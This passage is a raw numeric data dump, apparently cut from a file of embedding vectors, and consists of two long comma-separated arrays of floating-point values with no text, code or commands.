4494,0.0074874093,0.003448237,-0.033315487,0.0023091713,0.008217849,0.017508838,0.020834323,0.020240033,-0.01675302,-0.00015802363,-0.019138446,0.011544722,-0.0009300691,0.010198138,0.011004016,-0.009767103,0.0009380042,-0.01260705,-0.0072422684,0.021173144,-0.0001731222,-0.017779637,0.0033911108,-0.016621865,-0.010192104,0.0012147591,-0.004050994,0.0013701437,-0.01568228,0.0010913858,0.012684873,0.0151922,-0.01142116,-0.01183145,-0.0013280992,0.013040081,0.017521763,-0.00091304997,-0.009222294,0.010046403,0.014154119,0.0035738463,-0.01311126,0.009832112,-0.022656435,-0.00020953079,0.016117861,-0.0055243657,-0.009606019,-0.0036227375,0.008813548,0.018835796,0.00041997145,0.004929603,-0.036851432,0.01566221,0.007528402,-0.009109061,-0.0068199416,-0.010333207,0.0129373185,-0.0010951111,0.008750546,-0.002767695,0.011717026,-0.03041741,-0.0009541399,-0.00011010233,-0.004223123,-0.024154888,0.004332122,0.008878362,-0.025239382,0.004125485,0.007030446,0.018845947,0.0007574467,0.010426802,0.03264237,0.016206432,-0.001855267,0.026664505,-0.015717288,0.00057650165,-0.007896162,0.007160979,0.033393264,0.096471995,0.0025502522,-0.013592269,-0.0063151205,0.0063716765,0.023858134,0.0066255745,-0.018228699,-0.008345628,-0.0031083752,0.011811968,-0.023252724,0.01826013,-0.003295978,-0.010835438,0.028590204,0.019019635,-0.0000397496,0.0039641126,0.019981911,0.021236723,-0.041286066,-0.0017318235,-0.05361031,-0.0042494447,-0.04841837,0.022115905,0.022522628,-0.0038572685,0.03047258,-0.0031514084,0.0047169337,0.018513719,0.010110369,-0.029130498,0.014352323,-0.002033324,-0.0027734283,0.001029124,-0.025180785,0.02538995,0.0066842292,0.0004686338,-0.0026956704,-0.0039748284,-0.013544984,-0.008154533,-0.0019161701,0.002100426,-0.016812706,0.004599665,0.0065116263,0.026536455,-0.0018844693,0.03579639,-0.0013445735,-0.0024538503,-0.0007388203,0.015812827,-0.00032865428,0.018635126,0.013818975,0.009888176,-0.013250574,0.0049673356,-0.014543479,0.0038827367,-0.001580717,-0.021997893,-0.012797688,0.0018225479,0.006049352,-0.0072719003,-0.0057689347,-0.004882476,0.03164107,-0.011667898,-0.0019222009,0.015058103,-0.0047654505,0.017637093,0.01109392,0.01018304,0.005478447,-0.0078883255,0.010438206,-0.030501753,0.016231723,-0.009704629,-0.016070187,-0.016853731,0.023399623,0.025692012,0.020706637,-0.0003628814,-0.0043232758,0.00680899,-0.007921178,-0.008998528,0.005733996,-0.012780537,-0.025507035,0.0058724424,0.015910085,-0.007110729,-0.015659934,-0.01636599,0.026715172,-0.0067960736,0.0004012681,-0.0073381793,0.0065714987,-0.00051359815,0.01202668,-0.00085159735,0.04149252,-0.04096627,-0.032125734,0.025325669,-0.018729862,-0.013311441,0.006555902,0.017565165,0.035932608,-0.0000959994,0.0110881105,-0.0077411304,-0.009256542,-0.009016088,-0.010741247,0.016154284,-0.04207166,0.002516353,0.019209284,-0.003322571,0.015626984,0.020073682,-0.018470816,0.020531558,0.00699666,0.017622974,-0.015143154,0.00059020024,0.015032061,0.005924965,-0.014836542,0.029671261,-0.0030845967,-0.0016617817,0.0034728055,0.008129443,0.021276653,-0.011803164,-0.0068671373,-0.015433316,-0.008192464,-0.024005491,0.011278264,-0.0034905847,-0.021854281,0.0046516065,0.0034857416,0.005543451,-0.037787855,0.017243875,0.022737194,0.009047941,0.02193625,0.014376055,0.018134201,-0.021778066,-0.0031842683,0.0010122079,0.015642459,-0.0226835,0.008761514,0.020822596,0.014296205,-0.0011033062,0.0033754127,0.013625471,0.008082083,-0.003483252,-0.012061173,0.02437734,0.0051596924,0.009863615,0.0025450126,-0.036347535,0.021663103,0.01967507,-0.007725512,-0.0051535503,0.02306831,-0.011124694,0.009576776,-0.019572467,0.034755632,-0.019734522,-0.022910185,0.0036262257,0.013169389,0.0058987346,-0.029819287,0.004607783,-0.011512625,-0.0027594382,-0.016923184,-0.0034259614,-0.030627547,0.011370934,-0.003958781,-0.00019396615,-0.016289668,0.0035957515,0.0033114061,-0.0071308403,-0.02138149,-0.019187657,-0.01663167,0.0023423287,-0.0026611618,0.0059015183,0.0026287092,-0.015948823,0.007915597,-0.019611942,0.0075331405,0.0058703255,-0.025540033,-0.0015281463,0.01915173,-0.0036506879,-0.011293752,-0.023112608,-0.017340569,0.029571554,0.010684356,0.0091236625,0.009341037,-0.010357167,0.0016355889,-0.0040551755,0.0009903678,-0.007443502,0.0027585279,-0.017407775,-0.016026592,-0.004192921,-0.012877187,-0.03788689,-0.0069376086,-0.013407417,-0.020532012,-0.02312664,-0.018458761,0.007636595,0.03835164,0.012665218,-0.0068474114,0.021693531,0.014706011,-0.0014296086,0.015032493,-0.0002479066,0.02220458,0.021213053,0.0003288926,-0.013062342,-0.012167649,-0.0221808,0.019473627,-0.019237354,0.035488192,0.011481425,0.02021493,-0.0019635083,-0.0013366983,-0.0063575953,0.00012784262,0.0067971433,-0.022781359,0.0027538969,-0.023882069,0.011014342,-0.011601493,0.0022371116,-0.003124273,0.065037794,-0.038904764,0.0010486332,0.008189742,0.01060705,-0.014842836,0.012720092,0.015272958,-0.013367188,-0.023929145,0.010691739,-0.0025861666,0.009031212,-0.023658328,-0.008826099,-0.019541537,0.0013901555,0.016226683,0.026528332,0.0008880478,-0.0028830979,-0.0017893302,-0.0043043117,-0.0017688059,-0.010302443,0.0062855203,-0.029982166,-0.025711818,0.011920931,-0.008884317,0.0040963646,0.009631389,0.01651132,-0.020495972,-0.005831908,0.004178842,-0.007257383,0.022603404,-0.011790368,-0.04123549,-0.026654942,-0.019897938,-0.0032071841,0.007842732,0.008217436,-0.023975838,-0.011033976,0.0023884582,-0.002358618,0.13604234,-0.018824559,-0.005743765,0.0051371553,-0.00021781903,-0.0160103,0.033858787,0.022168748,-0.0055531333,0.02255032,0.023067141,-0.010560862,0.0011750831,0.009399889,-0.010413973,-0.014579652,0.010684621,0.15109289,-0.008539243,0.025558215,0.0053394656,-0.001384968,0.015424993,-0.003779584,0.0061445474,-0.099506006,-0.012432262,-0.029855972,-0.008949246,0.0014104925,-0.025622983,0.027535655,-0.001418138,0.00030960378,-0.0067560547,0.0019905549,0.022532811,0.008548632,-0.018927692,-0.010275541,0.00011806436,-0.00011807425,-0.009152398,-0.0018094335,-0.0018297306,0.0189968,-0.039121266,-0.011920367,-0.011027916,0.02748324,0.016877836,0.010420487,0.0067507466,0.007940557,-0.007028883,0.0038728742,-0.00063926366,-0.020207036,-0.027486114,0.022218417,-0.0020347293,0.004230915,-0.0023112225,0.032630842,-0.008422055,-0.0009009838,-0.025664542,0.009851078,0.016534923,0.022154532,0.0114977965,-0.0031095636,-0.015092173,0.0051329406,0.041031282,-0.0015811028,-0.023422135,-0.00014608774,0.007490003,0.005970393,0.019374331,0.009801911,-0.021318581,-0.0007030392,0.010720827,0.012919899,-0.0034603232,0.0030935728,0.019184772,0.0055452697,-0.0049067237,0.011060597,-0.0030405694,0.007684825,0.017486723,0.014783078,0.003336801,0.0024945824,0.011713312,-0.017251052,-0.015476777,0.022939002,0.00031606742,-0.011523317,-0.0098871365,0.019411802,-0.028809039,-0.036211483,0.018209606,0.006239561,-0.012157344,0.0022218844,-0.011145507,0.010697217,0.0009929916,-0.0036476883,-0.0095245065,0.000910444,-0.041467346,-0.020557068,0.0078918645,-0.012201368,-0.004099731,0.011941035,-0.010396202,0.012593401,0.0072959107,0.016146017,-0.02431147,0.0005308192,-0.014646536,-0.019217154,-0.024149204,0.050631728,-0.014927161,-0.026249347,-0.011180899,-0.03785648,-0.012624747,0.0037815266,0.000720547,-0.0019318864,0.010643708,-0.0063295807,-0.008850244,-0.0094849365,-0.0048046773,-0.010310883],[-0.0033847117,0.023553945,-0.028415268,0.0005762908,-0.0011995123,-0.008482635,-0.016971918,0.011051277,-0.021677647,-0.018855745,0.0072034895,0.011705644,-0.0007753498,-0.009914651,-0.008601027,-0.00077835936,0.0104575725,0.0033563906,-0.010305805,-0.0026164325,-0.005820592,-0.006265485,0.015186054,-0.022433385,0.015375807,0.00362764,0.001895932,-0.0012541764,0.013457759,0.010158987,-0.007710569,0.02559729,0.010873296,0.010604802,-0.0008859418,-0.011039317,-0.023429597,-0.012520035,0.018470045,-0.011348337,-0.00034810536,0.010094497,0.0132392235,0.010313524,0.008174614,-0.003918287,0.0035176221,-0.007658414,-0.00009125659,0.009713122,0.0061157728,-0.004017191,-0.033081945,0.016571105,-0.011305054,0.01932562,0.012899191,-0.035881367,0.016802955,-0.012094296,-0.011552299,0.016702127,0.0030154083,-0.012444087,0.0011780249,-0.004939744,-0.0187,-0.02031329,0.0008387932,-0.018151255,0.0061966535,-0.006654364,0.015848337,-0.0046792873,0.019300967,0.0037812088,0.007765669,-0.0070808996,-0.013572695,0.0040084273,-0.012310912,0.009593472,0.002506505,-0.014994709,-0.002881186,-0.009265125,-0.019767534,0.009827241,0.01716996,-0.03062317,0.007569297,0.009781015,0.010920981,0.007864438,-0.021054635,0.009950508,0.0071804584,-0.011488761,0.00052185555,0.016090257,0.00011339993,-0.010861149,-0.026637174,0.009446263,0.006814589,-0.013880059,-0.01106934,0.00618983,-0.002270963,-0.023817662,0.013362092,-0.007435011,0.017838571,0.008765768,-0.007133032,0.01755716,0.0010145598,0.033486173,-0.012873904,-0.014558075,0.010965378,0.01895012,0.019670047,0.011695052,-0.019030731,0.010778298,-0.031056872,0.018804707,-0.004328242,0.0041956278,-0.009203252,0.009126084,-0.0101179145,-0.014723637,-0.0027558198,-0.0024498247,0.0025719593,-0.009799133,0.015399677,-0.017054968,0.024696415,-0.003945977,0.0025609517,-0.016358126,-0.00041447335,0.021329144,-0.0003716513,0.024774548,0.033303995,-0.013266341,0.011856316,0.0123737175,-0.0076177823,0.004912643,-0.010112975,0.029685171,-0.0021782664,-0.015579506,-0.013495641,-0.0068893004,-0.012865466,0.0045481618,0.015862137,-0.007296301,-0.020444075,-0.022997199,-0.015237395,-0.00008928843,-0.028417977,0.016387254,0.018913228,0.01875981,0.023930594,0.001027687,-0.0036810704,0.011131639,-0.015261654,0.0065542622,-0.002812129,0.014796375,0.01758846,-0.018597834,0.022257678,-0.0063054566,0.0046533924,0.022249961,0.019796727,-0.026073117,-0.0108330725,-0.009617532,-0.011641224,-0.025773982,0.020308832,0.000114288974,-0.0066086426,-0.011493822,0.017634183,0.087551005,-0.0009708253,0.009692976,-0.0041887667,-0.011224674,0.0012612615,-0.048571605,-0.0073215794,-0.016765729,0.0065491446,-0.024183355,0.013803898,-0.0041968976,0.01004861,0.01614632,-0.0049767587,0.009691223,0.0056136185,-0.08244175,0.007935665,0.011795157,-0.009846616,0.010169465,-0.021295734,0.009405896,0.0022665407,-0.021586442,0.013578276,-0.03329372,0.014015528,0.019671453,0.01133117,-0.034157213,0.007841483,-0.01175319,-0.024788415,-0.0021123828,0.006771238,-0.027165275,0.006157937,-0.017672634,0.017408801,-0.0076109497,0.00052233995,-0.003387318,0.012801182,0.031374477,-0.0075481352,0.011602821,0.018107584,-0.007171327,-0.01034056,0.018102271,0.015882323,-0.001160392,0.020415612,0.042960137,-0.0068136947,-0.016393164,0.0117104715,-0.02844749,-0.014523355,0.0055042915,0.013874862,0.01412629,-0.0113135455,0.015012705,0.026956702,-0.01524482,0.011189408,-0.0024961499,-0.027465977,-0.0040532416,-0.015866129,0.012075377,0.001439302,-0.007762536,0.005305519,0.010061439,0.009003492,-0.0016623872,0.0051801223,-0.005565256,-0.0024558753,-0.004679825,0.008005076,-0.01101969,0.0072775492,0.01887797,0.007921728,-0.0068503786,0.010564932,-0.009815219,0.020705579,-0.007182664,0.011800974,0.01713511,-0.0022493426,0.009676852,-0.00094468996,-0.0056651584,0.01746191,-0.020022562,0.007060824,-0.012222498,0.013607619,0.009314444,-0.00330618,-0.00057713926,-0.012154708,0.030106425,-0.020340895,0.018053208,-0.036432028,-0.025608553,-0.010817115,0.003726453,0.016303167,0.007350947,0.0054208343,-0.0050969576,-0.008233721,-0.006418836,0.020227667,-0.018649481,0.017739085,-0.0196151,0.0033498942,0.008440643,0.011266838,-0.005359759,0.024617797,0.0020246315,-0.009712382,-0.0037945125,0.015587943,0.015608926,-0.008351263,0.01858129,-0.008011928,0.03617616,0.0015026524,0.011077098,-0.018908033,-0.010708657,-0.0037052857,0.020453662,0.014120925,-0.0011373421,-0.0074294764,0.0040566586,-0.008333611,0.011759721,0.019797496,-0.015050713,-0.021070004,-0.019271238,-0.015665527,0.008067206,-0.004616391,-0.018005667,-0.0013634091,0.0046489085,0.016603718,0.00027359443,-0.018095415,0.0074902256,0.06640769,0.00067889964,0.009350403,0.009461025,-0.008633948,0.0027486535,0.020714093,0.011759675,0.013532062,-0.0040675765,0.00088948064,-0.011024003,0.005253433,0.0200139,0.005658592,0.021429311,-0.012800048,-0.019413976,-0.018338064,-0.01932655,0.024832772,-0.010973429,-0.0062081753,0.010921294,0.0077686515,0.0149667105,0.01251667,-0.006652414,0.004974163,-0.010868926,-0.0065649,0.008849549,0.007190221,0.014354415,-0.030480582,0.017183729,0.0048153717,-0.0033613902,-0.017745148,-0.0031102607,0.014154234,0.010651609,-0.01285766,0.0072846664,-0.018326517,0.010994813,0.0048971283,-0.01604072,-0.031727195,0.014249015,0.0014715851,0.010537747,-0.028955117,0.023829408,-0.024496166,0.0040736054,0.0033372468,-0.050037984,0.036167867,0.018625453,0.004247228,0.008503244,0.0032155432,-0.006169942,-0.008461314,0.02885922,-0.03766176,-0.012996602,-0.016153533,-0.008811076,0.007322709,0.005449374,-0.014739601,0.003243773,-0.0068820603,0.01881006,0.0075174356,-0.022719014,0.004821095,0.03204478,-0.026308302,-0.0030619747,0.011893785,-0.011830351,-0.0033685775,0.027005825,0.015678804,0.025676014,0.0039811637,-0.034134842,-0.015567656,0.005998829,-0.000010250099,0.016623529,0.016626297,0.018422592,0.04000941,0.009181031,-0.011819033,0.013438623,0.009547678,0.010500455,-0.004908273,-0.018427702,0.016048083,0.020253114,0.009551991,0.010177885,0.0007645149,0.028299386,-0.0038821227,0.002042898,0.014898481,-0.016667569,-0.00078636466,-0.025624568,-0.009319975,-0.018449578,-0.00059538614,-0.0020083194,0.019640708,0.010983386,-0.003748688,0.030811563,-0.006494799,-0.0006057766,-0.013726072,-0.016243897,0.030749852,0.020436559,0.009067562,0.01674579,0.0028782014,-0.03672761,0.026362684,-0.006927268,-0.013777292,-0.02439416,0.01189448,0.024747461,0.02111758,0.028238619,0.029877953,0.0012178506,-0.0017924925,0.02708804,0.03929811,0.0031782754,-0.016794015,-0.019453598,-0.021204386,-0.011985079,0.0063788057,-0.01998499,0.011416712,-0.009806722,0.03933861,-0.013998652,0.008346187,-0.0025423837,0.0028409646,-0.021466525,-0.029130619,0.00097570516,0.0018907215,0.026564922,-0.01805685,0.028900499,-0.022475071,-0.016720176,-0.025007267,-0.0006513047,-0.0077270786,-0.00046980762,0.0008924019,-0.037230246,0.0009799186,-0.006215896,0.024442192,-0.008876265,0.026558433,-0.012892132,-0.011539441,0.019541822,0.0026308668,-0.003995657,-0.0073698694,-0.006731043,-0.0065803183,-0.0068979864,-0.042702332,-0.036564074,0.026118148,0.02627429,0.011857249,-0.02750657,-0.012787536,-0.011336546,0.0051430827,0.015090497,0.0027376115,-0.017026888,0.010507266,0.013590656,0.0016500918,0.0105234245,0.0425083,-0.0029382098,0.007990862,0.017541138,0.019343935,0.022884868,-0.0061035017,0.010999819,0.01939338,0.016851882,0.0006165028,0.0070065395,0.040232725,0.024363823,0.030728215,-0.027168987,-0.0021111518,-0.002115941,0.010154321,-0.002404234,0.008245179,0.008123716,-0.000042300362,-0.008592835,-0.0013846558,-0.022863794,-0.012889294,-0.0058012214,-0.0035172212,0.009406616,-0.042556167,-0.012240124,0.007952225,-0.01931691,0.013215705,0.012497753,0.00036571687,-0.013039595,0.018859053,0.01467811,-0.013668559,-0.009843985,0.010924473,-0.008910594,0.010165,0.0047483016,0.017433846,0.0030577162,-0.005260417,0.010084996,-0.006924726,0.025248544,-0.01704646,0.018131282,-0.0025725763,0.012672561,-0.0055869194,-0.014997732,-0.027284035,-0.004835264,0.0030669675,-0.03724166,0.008923586,-0.011441549,0.020719383,-0.0016881423,0.0049009686,-0.0008488574,0.000067646215,-0.0048045497,-0.014433955,0.015060205,-0.05663634,-0.0055087064,0.009684148,0.0046464424,-0.0029975104,0.03253962,0.01275511,-0.0017117787,-0.013476227,-0.013936409,-0.0054062577,0.0059110285,-0.032358754,0.00051144697,0.018668873,-0.010405077,-0.029144071,-0.019159457,-0.014913898,-0.04229598,-0.011092169,0.029317122,0.019991256,-0.0010048047,-0.009543747,0.022719592,0.0061121755,-0.01352394,-0.011588247,-0.029760316,-0.008820523,0.001118221,-0.03231474,0.010313881,-0.015742566,0.00538819,-0.001431992,-0.015957206,-0.009828753,0.006529103,0.005155954,-0.003006864,-0.0016860142,0.025274493,-0.02774152,0.011074432,-0.028252402,0.018296879,-0.0031173907,0.032482803,0.00683471,0.026472364,0.0047196643,0.013733972,-0.0066061183,0.022420282,0.026185201,0.023571173,0.009110862,0.010705529,0.00919414,-0.011263394,0.018066796,0.01273794,0.008582686,0.019444745,0.03888143,-0.00963092,0.018152168,-0.009065482,0.007977153,0.00473665,0.009491839,0.0008623922,0.013999069,0.005045783,0.019381905,0.016712151,-0.0017436758,-0.0009898136,-0.018989168,-0.012075702,-0.010358322,0.027850058,0.0095066745,0.011840327,0.011127238,0.0008373509,0.0017445794,0.015512226,-0.014141819,-0.013621663,-0.013121806,-0.025941886,0.025740732,-0.0009949462,0.016781403,-0.036217064,0.009324742,0.030301228,0.025004031,0.010490652,-0.02322889,0.005059363,0.01625048,-0.012689204,-0.020975173,-0.03735939,0.018377926,0.037288807,-0.012390523,-0.0056374664,0.018241925,-0.0059113842,-0.006193231,0.013142545,-0.000090775095,-0.03701701,-0.008090667,-0.013356314,-0.001857274,0.0038255977,-0.005398715,0.0063247187,0.008531139,-0.006721487,-0.013015577,0.0025606384,-0.0017303902,-0.004355797,0.0026241648,-0.004764595,-0.006445292,-0.0214602,-0.018072281,0.011033721,0.0130273495,-0.05521435,-0.0070316033,-0.020786379,0.028913818,-0.026109714,0.0066567906,-0.013544474,0.038987815,0.014833022,-0.014196847,0.0059699644,0.0089862775,0.0037316312,0.02379036,0.031552818,-0.008874644,-0.042001218,-0.011625941,0.023341186,-0.02391869,0.012389361,-0.011618009,-0.012834212,-0.021781417,-0.041108236,0.0054240436,-0.019236373,-0.007826094,0.0037062224,-0.016361313,0.021704733,0.0017686496,0.00177798,0.008475195,0.0016626483,0.020712573,0.0019570177,0.0010060557,-0.042053558,-0.009497785,-0.018835206,-0.0026422332,0.010468803,0.011842125,-0.02868639,-0.020460226,-0.02110669,0.010795164,-0.016075356,0.02834339,0.007510687,-0.008591429,-0.018938206,0.027010499,-0.0056327237,0.009038702,-0.025040437,-0.024765432,0.02486528,0.0031259025,0.0078339325,0.0033649646,-0.007900941,0.019491917,-0.007815504,-0.026378945,0.0058136564,-0.0004719439,0.011318289,0.008673533,-0.00031270648,-0.011516708,-0.01871336,0.014582402,-0.02857555,-0.008720664,0.051642057,0.0033917082,-0.010138181,0.005208358,-0.030194882,-0.01826411,-0.0076572825,0.005062579,-0.008415972,0.020355213,0.0049676504,-0.0010302347,0.009589658,0.002724241,0.033939824,-0.0011419798,0.008187485,0.023602387,0.008356437,-0.030331654,-0.003784456,-0.005162829,-0.0048246835,-0.008684145,0.0024405099,-0.0037109095,0.0068596005,0.022842985,-0.01369319,-0.0059494744,0.03959961,-0.0050615594,0.012202664,0.0069743376,0.01101067,-0.012376208,0.020753931,0.017935583,-0.03775459,-0.021742871,0.0031857213,-0.019586932,0.020184964,-0.043955617,0.011393728,-0.0034681025,0.009299119,0.0074029355,0.004465615,0.004057529,-0.005531005,0.009743918,-0.002276465,-0.010589083,0.0105225295,0.0018480881,0.009844306,-0.004749326,-0.005642936,-0.0067442656,0.0030793657,0.002458703,-0.012294323,-0.0019111708,-0.014038034,-0.008773578,-0.0007463889,0.0063656857,-0.030194981,0.028557174,0.008028777,-0.003047204,-0.010434961,-0.0027140235,0.0010906581,0.01654332,0.0057587526,-0.020399222,0.018233873,0.014348804,-0.005567845,-0.010977609,-0.011123836,-0.072288364,0.011423417,-0.0039062942,-0.0061295144,-0.005706638,-0.006752542,0.01652121,0.008727732,0.024897365,-0.019447567,0.0023131322,0.0011867068,0.0040352927,0.007061318,0.0071977777,-0.0016550604,-0.0021280744,0.007975575,0.01418851,0.016929433,-0.013101322,0.001897331,0.014002548,-0.0003746606,0.028369384,0.0025796462,-0.016180385,0.00080072024,-0.008357885,-0.012503785,-0.0033989241,-0.006439083,-0.01915739,-0.010949258,-0.0157132,0.002416557,0.004331332,0.00030687472,-0.008436557,0.008920045,-0.007133703,0.0011731595,0.011832428,0.01924127,-0.007067866,-0.03370413,0.010622901,-0.004691694,0.004853311,-0.02348133,0.021321017,-0.0075505297,-0.011629065,0.0077274097,0.001074908,0.015394497,0.005636232,0.0067165773,0.021762557,0.007636047,0.004746526,-0.007210822,0.02102361,0.024429463,-0.033083167,-0.010120393,-0.007572967,0.033473756,0.0011982666,0.014577708,-0.0047024516,-0.0043824976,-0.01113727,-0.0038898434,-0.009892406,0.021386318,-0.0003580598,-0.009857896,0.0019848237,-0.025890544,-0.0123429075,0.020026376,-0.028591895,-0.004154249,-0.019220147,-0.006519182,0.0006596813,-0.005514628,-0.0027738411,-0.009698558,0.0024470163,0.02407747,0.009597207,0.006082723,0.0075679393,0.021477254,0.011156502,-0.00024868012,-0.006352409,0.000010360634,0.011259093,0.0007274024,-0.001240196,0.054428786,0.011060298,0.0009110374,-0.00019397336,0.020833645,0.0052318643,0.013545691,0.009692383,0.0007916342,-0.0023522032,-0.007478014,0.01646658,0.014524983,-0.015761577,0.026450906,0.03727365,0.020290833,0.005137616,-0.009868237,0.017195452,0.011328809,0.017612966,0.004563768,0.0136676775,0.0050507416,-0.013268115,0.020442752,-0.01616104,0.013321977,0.023956822,-0.007572531,0.01510984,0.021221513,0.0039670626,-0.033917952,-0.015091419,-0.0012199751,-0.018547785,-0.0006970654,-0.0052004303,0.0073539824,0.023071999,-0.027698314,0.010519765,0.0016831239,0.004030953,0.015558082,0.016018156,0.013545439,0.0036023466,0.011971037,0.017099535,0.004055451,0.007215529,-0.0066435845,0.032861587,0.0044502546,-0.0082082115,-0.023007233,0.0031082577,0.018239165,-0.009510698,-0.008912867,-0.01904171,0.0060912375,-0.0067998106,0.005601317,0.0076501314,0.020248313,-0.007179324,0.032661118,-0.01129594,-0.0075309533,0.018861841,0.01742653,0.008039436,0.00479661,-0.0043022637,0.027499454,0.009485778,-0.0001421995,0.013589731,-0.017496224,-0.014040907,-0.010732686,-0.023808403,-0.0065577193,-0.010612766,0.010396429,0.016918646,-0.007912952,-0.014438758,0.04273495,-0.035419956,0.032482196,-0.015504384,-0.0046490626,-0.0036221803,0.017735202,0.031254444,0.012825377,-0.012309361,0.015043614,-0.0065680216,-0.025549794,0.0005261562,-0.022888588,-0.003648533,-0.009387733,-0.0052802702,-0.0015372335,0.004050955,0.0052510207,-0.02177094,-0.012039417,0.00834967,-0.008999952,0.0041528475,0.025554191,-0.0006907833,0.011177852,0.00040618487,-0.01917576,0.023679817,-0.00046717562,-0.0024108484,-0.008654522,0.031312883,-0.004566827,0.009268351,0.012392272,-0.025470523,0.021048307,0.009698317,-0.0036549778,-0.0039856276,0.0035232168,0.0077172066,-0.00022715346,0.020605532,-0.010447722,-0.026333112,0.008107909,-0.013072311,0.0017419691,0.015657261,-0.0010237527,-0.004295707,-0.0103579275,0.0046064365,0.001124885,-0.026951239,0.01507568,-0.0004276063,0.0060643526,0.0027171567,-0.0146685345,-0.012624135,-0.00088246213,-0.012038001,0.018438376,-0.0014572373,0.005505286,0.027390586,0.014887962,0.023028461,0.028424516,-0.00818876,-0.00063230377,-0.018344874,0.00938947,0.009089781,0.006196506,-0.018306134,-0.007718685,-0.0056011,0.01805893,0.0146945175,-0.016372405,-0.015020667,-0.026516154,0.01515397,0.03343595,-0.0033890707,-0.009107359,0.008939864,-0.0100556,-0.026847187,-0.029146157,0.003079022,0.02275441,-0.0015105652,0.008992276,-0.025254337,-0.010425723,-0.016274149,-0.014214168,0.06035575,-0.0063797804,0.003409596,-0.002434594,0.027327582,-0.013600228,0.01899818,0.00029754598,0.0029607625,-0.01092584,-0.014306613,-0.019391859,-0.0114394175,0.006539511,0.011612682,-0.008495582,0.008378845,-0.0011519887,0.0036184348,0.022698894,-0.0004619409,-0.011666171,0.0012395575,-0.0055697635,0.0029301492,0.015435883,0.0004871321,-0.0070518614,0.007525053,0.0049536536,-0.007709832,-0.014100572,0.022570519,0.012859397,-0.013404857,-0.0043314397,0.021821948,-0.012736787,-0.030527279,0.004935699,0.004707737,-0.037193984,0.044685252,0.004246764,0.019798901,-0.015210184,-0.010554735,0.0037806062,-0.011616737,-0.013413991,0.0038663372,-0.011364248,-0.0136998845,0.020975152,0.006549006,0.0175113,-0.00478584,0.0261827,0.022086835,-0.000468126,0.011260737,0.026070148,-0.017598333,-0.011980247,-0.016186515,0.0016339432,0.008657025,-0.010021226,0.008270808,-0.024888527,-0.00011528428,0.0032478936,-0.012961328,0.0125629585,0.0038235143,0.0010099568,0.007406625,-0.012075222,-0.0066698557,-0.018050939,-0.0027484861,0.008661639,0.030092308,0.012832238,-0.03795155,0.00703389,0.0114143295,-0.02454635,0.07452732,0.016607117,0.0036825847,-0.0047127362,0.011069491,0.019576777,0.0071206708,0.016667567,-0.00923008,0.0054297955,-0.026097754,0.013682948,0.004427425,-0.0011473142,0.019901754,-0.018332982,0.011666307,0.00079908385,0.004930343,-0.015855668,-0.010396918,0.022300953,0.009937744,-0.007870134,-0.019837504,0.007227377,0.0027839795,-0.00074279046,0.0088021215,-0.030521752,-0.029488714,-0.000554895,0.0117077585,0.0064529297,-0.01452569,-0.071666785,-0.0018235168,0.14539266,-0.0008284711,-0.014883242,0.018475464,0.01338361,0.006286358,-0.13597445,0.012890968,0.0016319671,0.0022234137,0.004483204,-0.0108672455,0.000019554373,0.028213164,0.0048565133,0.002025735,-0.014396612,0.0027818768,0.0103100175,-0.013637517,-0.0071041863,0.015693435,-0.012171747,0.012801037,-0.01894972,-0.008171976,-0.0069792806,0.002667531,-0.003172665,-0.029017994,0.0020379839,-0.0010040144,0.004284037,-0.002304033,-0.0019059826,0.026805397,0.012761477,-0.009814714,-0.019697174,0.011471789,0.03155459,0.018373432,0.00057793816,-0.022046458,-0.1686781,-0.010244715,-0.005749991,-0.028996993,0.033582423,-0.025993718,0.0017153098,0.015012817,-0.005150482,-0.02194613,-0.00036179807,0.030634608,0.0059250765,0.002335067,-0.026216324,-0.00859612,0.0063619795,-0.0071836514,-0.009302937,0.004754213,0.00016801307,-0.0015618328,-0.016941912,-0.03283529,-0.0010785812,0.013472401,0.0066288505,0.045035154,0.0031417562,0.0009784678,0.0012164885,0.005032469,-0.02256813,0.0232005,-0.015640734,-0.026197348,0.008997562,0.006083153,-0.015379869,0.00793295,-0.008663022,0.009248378,-0.0037150828,-0.014160094,-0.0033578305,0.0070378752,0.0076671974,0.010513846,0.0025776944,0.0054824213,0.021001838,-0.0006324679,-0.0014862634,0.0054700277,0.0010950705,0.0039715003,-0.0049906266,-0.01094863,-0.013293313,0.010314891,0.0044740997,-0.032388397,0.002982034,0.0006788787,0.030943766,-0.008707748,0.031091731,-0.0067822705,0.0022491454,0.012532576,-0.00083017856,-0.0085566575,-0.020679383,-0.015871016,0.01364511,0.006545221,-0.0038891714,0.00043211968,0.02008965,-0.01805911,-0.0040723803,-0.006872476,0.0003915437,-0.034722,0.0051160012,-0.013903302,-0.010426742,-0.020549785,0.007479681,-0.005245126,0.03658915,-0.0071319817,0.0049800742,0.012810486,0.033555903,-0.008954587,0.037440315,0.0045347735,-0.039658826,0.001376863,-0.0027063666,-0.03623565,0.0023144197,0.01633924,-0.008812355,-0.0067735775,0.008201835,-0.020844381,-0.0026631951,0.004827542,-0.00077087706,-0.0030894259,0.019388173,-0.0023581488,-0.0032089576,-0.023609549,0.0052147917,0.0062931417,0.008602466,-0.01938537,-0.027404264,0.003601507,-0.015427465,0.02109,0.03318711,0.010242952,-0.017884297,-0.00020261742,-0.015981723,0.0075600105,-0.023667255,0.020651946,0.0066084303,0.014849289,-0.021448152,-0.0057662507,-0.015333874,0.011381399,-0.01654348,-0.01642268,0.007673189,-0.019668942,-0.00662478,-0.0020028034,0.020296654,-0.016035313,0.03036396,-0.010009434,0.017532334,-0.009977607,0.008844093,0.014102684,-0.027191099,-0.022039244,0.006499491,0.07738378,0.0071815923,-0.01441234,0.011509733,0.0124598835,0.0004135411,0.021892883,-0.020406542,-0.023082275,-0.015727185,-0.00012932085,0.0030878857,0.00950396,0.007725071,-0.01820886,0.00039610322,0.004630542,0.01980838,-0.0027090162,0.008651239,0.0004700961,-0.013449153,-0.001486853,0.040044658,0.01101826,0.031701606,-0.008134089,0.0026711295,-0.007824363,-0.012327562,0.00357572,-0.009799781,-0.017902201,0.00605168,0.0012868721,-0.031779677,-0.0023455787,0.00096332777,-0.011618322,-0.011164293,-0.0017717686,0.020913796,0.00778801,-0.012292548,-0.009472402,-0.0237117,0.00071203685,0.005686504,-0.00096758635,-0.011062721,-0.00027287964,0.010232452,-0.00028347876,-0.017028503,0.002887208,-0.005352758,0.006561878,-0.008835528,0.019292977,0.0026725421,0.021819176,-0.0098660365,-0.021822501,-0.005226173,-0.011458309,0.002480929,-0.024073886,0.0043481276,0.0033093693,0.007761801,-0.002185398,0.009863851,-0.011457623,0.009809985,0.011846778,-0.010294334,-0.0030156572,0.01103879,-0.012625544,0.014973014,-0.0043441015,0.023104116,